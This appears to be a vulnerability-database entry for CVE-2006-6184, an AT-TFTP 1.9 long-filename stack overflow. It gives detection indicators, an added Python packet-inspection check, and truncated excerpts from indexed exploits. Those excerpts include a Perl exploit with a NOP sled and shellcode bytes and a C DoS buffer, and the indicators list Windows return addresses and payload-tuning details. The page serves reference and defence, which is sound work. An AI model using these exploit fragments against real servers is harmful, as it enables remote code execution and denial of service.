CVE-2006-6184
Published 2006-12-01
Priority: P2 (63) · Severity: critical · CVSS 2.0 base score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Exploit available
EPSS: 65.65% (99.2 percentile)
Multiple stack-based buffer overflows in Allied Telesyn TFTP Server (AT-TFTP) 1.9, and possibly earlier, allow remote attackers to cause a denial of service (crash) or execute arbitrary code via a long filename in a (1) GET or (2) PUT command.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alliedtelesyn | at-tftp | <= 1.9 | — |
Detection & IOCs (extracted from sources)
- Bytes: \x00\x02 followed by 300 bytes of \x41 + \x00 + netascii + \x00 (DoS payload)
- Bytes: \x00\x02 + 25-byte NOP sled + payload + ret + \x83\xc4\x28\xc3 + \x00 + netascii + \x00 (Metasploit WRQ overflow)
- Bytes: \x00\x02 + 63-byte NOP sled + shellcode + \xf4\xf5\xe3\x75 + \x00 + netascii + \x00 (Perl exploit WRQ payload)
- Return address 0x702ea6f7 (Windows NT SP4 English)
- Return address 0x750362c3 (Windows 2000 SP0 English)
- Return address 0x75031d85 (Windows 2000 SP1 English)
- Return address 0x7503431b (Windows 2000 SP2 English)
- Return address 0x74fe1c5a (Windows 2000 SP3 English)
- Return address 0x75031dce (Windows 2000 SP4 English)
- Return address 0x71ab7bfb (Windows XP SP0/1 English)
- Return address 0x71ab9372 (Windows XP SP2 English)
- Return address 0x7c86fed3 (Windows Server 2003)
- Return address \xf4\xf5\xe3\x75: call [ESP+28] in IMM32.dll on Windows 2000 Server SP4 Italian
- Trigger: a TFTP WRQ (opcode \x00\x02) or RRQ (opcode \x00\x01) packet with a filename field exceeding roughly 210–300 bytes, sent to UDP/69; the overflow occurs while the filename is parsed, before the mode string (e.g. 'netascii') is reached.
- The Metasploit module uses EXITFUNC=process and a StackAdjustment of -3500; payload space is 210 bytes with the null byte as the only bad character, which is useful for tuning payload-based signatures.
- The stack-adjusting gadget \x83\xc4\x28\xc3 (add esp, 0x28 / retn) appears immediately after the return address in the Metasploit exploit and can serve as a byte-level signature in UDP payload inspection.
- AT-TFTP v2.0 is also vulnerable to a similar stack-based buffer overflow via a long filename in an RRQ (\x00\x01) packet; the SEH overwrite occurs at 261 bytes of filename data.
- The Metasploit module requires LHOST to be set because the NOP sled length is calculated as (25 - len(LHOST)); an incorrect LHOST shifts the payload and may cause exploitation to fail.
- Return addresses are OS/SP-specific; the module provides targets for Windows NT SP4 through Windows Server 2003 (English). Non-English or unlisted SP versions are not covered and exploitation will fail.
- The AT-TFTP v2.0 variant (exploit-db 24952) triggers an SEH overwrite at 261 bytes, but no exception is raised (possibly due to a stack cookie), making it a crash/DoS only; it is not reliably exploitable for code execution.
- The null byte (\x00) is the only bad character for the payload; any shellcode or ROP chain used must be null-free.
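A defender-side check for the trigger described in the bullets above, written as an added example that is not part of the original page or of any exploit it indexes: it parses a TFTP RRQ/WRQ datagram per RFC 1350 and flags an oversized filename, a missing NUL terminator, or the add esp,0x28/retn gadget bytes. The 200-byte cut-off and the sample datagrams are constructed assumptions.

```python
import struct
from dataclasses import dataclass
from typing import Optional

# Assumed cut-off: the page puts the overflow at ~210-300 bytes of filename.
MAX_SANE_FILENAME = 200
# add esp,0x28 / retn gadget bytes noted above; used only as a signature.
STACK_ADJUST_GADGET = b"\x83\xc4\x28\xc3"
OPCODES = {1: "RRQ", 2: "WRQ"}

@dataclass
class TftpRequest:
    opcode: int
    filename: bytes
    mode: Optional[bytes]
    terminated: bool  # False when the filename field had no NUL terminator

def parse_request(payload: bytes) -> Optional[TftpRequest]:
    """Parse a TFTP RRQ/WRQ per RFC 1350: opcode | filename NUL | mode NUL."""
    if len(payload) < 2:
        return None
    (opcode,) = struct.unpack("!H", payload[:2])
    if opcode not in OPCODES:
        return None  # DATA/ACK/ERROR carry no filename field
    body = payload[2:]
    end = body.find(b"\x00")
    if end < 0:  # malformed: filename runs to the end of the datagram
        return TftpRequest(opcode, body, None, False)
    rest = body[end + 1:]
    mode_end = rest.find(b"\x00")
    mode = rest[:mode_end] if mode_end >= 0 else (rest or None)
    return TftpRequest(opcode, body[:end], mode, True)

def inspect_packet(payload: bytes) -> list:
    """Return the reasons a UDP/69 datagram looks like a CVE-2006-6184 attempt."""
    req = parse_request(payload)
    if req is None:
        return []
    findings = []
    if len(req.filename) > MAX_SANE_FILENAME:
        findings.append(f"{OPCODES[req.opcode]} filename of {len(req.filename)} bytes")
    if not req.terminated:
        findings.append("filename field not NUL-terminated")
    if STACK_ADJUST_GADGET in payload:
        findings.append("add esp,0x28/retn gadget present in payload")
    return findings

# Constructed sample datagrams (not captures from the original page).
BENIGN_RRQ = b"\x00\x01boot.cfg\x00octet\x00"
DOS_WRQ = b"\x00\x02" + b"A" * 300 + b"\x00netascii\x00"
```

Feed `inspect_packet` the UDP payload of each port-69 datagram from a capture; an empty list means nothing matched.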
No detection rules found.
Exploit-DB: Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Buffer Overflow (Denial of Service) (PoC) (exploitdb, 2013-04-12)
---
# Exploit Title: AT-TFTP 2.0 long filename stack based buffer overflow - DOS
# Date: 12.04.2013
# Exploit Author: xis_one@STM Solutions
# Vendor Homepage: http://www.alliedtelesis.com/
# Software Link: http://alliedtelesis.custhelp.com/cgi-bin/alliedtelesis.cfg/php/enduser/std_adp.php?p_faqid=1081&p_created=981539150&p_topview=1
# Version: 2.0
# Tested on: Windows XP SP3
#
# From 1.9 Remote Exec BOF discovered in 2006 by [email protected] to 2.0 Remote DOS BOF 2013 - no lesson learned.
# Two variants:
#
# 1. SEH overwrite but no exception handler trigger (cookie on stack?)
# 2. Read access violation (non-exploitable?)
#
# Still we can crash the server remotely.
#
#!/usr/bin/python
import
Exploit-DB: Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Long Filename Overflow (Metasploit) (exploitdb, 2011-03-05)
---
##
# $Id: attftp_long_filename.rb 11882 2011-03-05 21:00:57Z bannedit $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Allied Telesyn TFTP Server 1.9 Long Filename Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in AT-TFTP v1.9, by sending a
request (get/write) for an overly long file name.
},
'Author' => [ 'Patrick Webster ' ],
'Version' => '$Revision: 11882 $',
'References' =>
[
['CVE', '2006-6184'],
['OSVDB', '11350'],
Exploit-DB: Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Denial of Service (exploitdb, 2009-12-22)
---
//################################################
//
//Vulnerability: Remote Buffer Overflow Exploit
//Impact: Remote Denial of Service Attack
//Vulnerable Application: TFTP Daemon Version 1.9
//Tested on Windows XP Service Pack II
//
//Author: Socket_0x03
//Contact: Socket_0x03 (at) teraexe (dot) com [email concealed]
//Website: www.teraexe.com
//
//################################################
#include
#include
#pragma comment(lib, "ws2_32.lib")
char Buffer_Overflow[] =
"\x00\x02"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" // A = 41. 300 bytes...
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x
Exploit-DB: Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - 'Filename' Remote Buffer Overflow (exploitdb, 2006-12-03)
---
#!/usr/bin/perl -w
#acaro[at]jervus.it
#https://www.securityfocus.com/bid/21320
#
# [email protected] is credited with the discovery of this vulnerability
use IO::Socket;
if(!($ARGV[1]))
{
print "Uso: atftp-19.pl \n\n";
exit;
}
$victim = IO::Socket::INET->new(Proto=>'udp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Cannot connect to $ARGV[0] sulla porta $ARGV[1]";
$pad = "\x90"x63;
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
$shellcode = "\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf1".
"\xf1\x59\x06\x83\xeb\xfc\xe2\xf4\x0d\x19\x1d\x06\xf1\xf1\xd2\x43".
"\xcd\x7a\x25\x03\x89\xf0\xb6\x8d\xbe\xe9\xd2\x59\xd1\xf0\xb2\x4f".
"\
Metasploit: Allied Telesyn TFTP Server 1.9 Long Filename Overflow
This module exploits a stack buffer overflow in AT-TFTP v1.9 by sending a request (get/write) for an overly long file name.
No writeups or analysis indexed.
References:
- http://secunia.com/advisories/23106
- http://securityreason.com/securityalert/1929
- http://securityreason.com/securityalert/8120
- http://www.exploit-db.com/exploits/16350
- http://www.exploit-db.com/exploits/24952
- http://www.osvdb.org/11350
- http://www.securityfocus.com/archive/1/452743/100/0/threaded
- http://www.securityfocus.com/bid/21320
- http://www.vupen.com/english/advisories/2006/4737
- https://exchange.xforce.ibmcloud.com/vulnerabilities/30539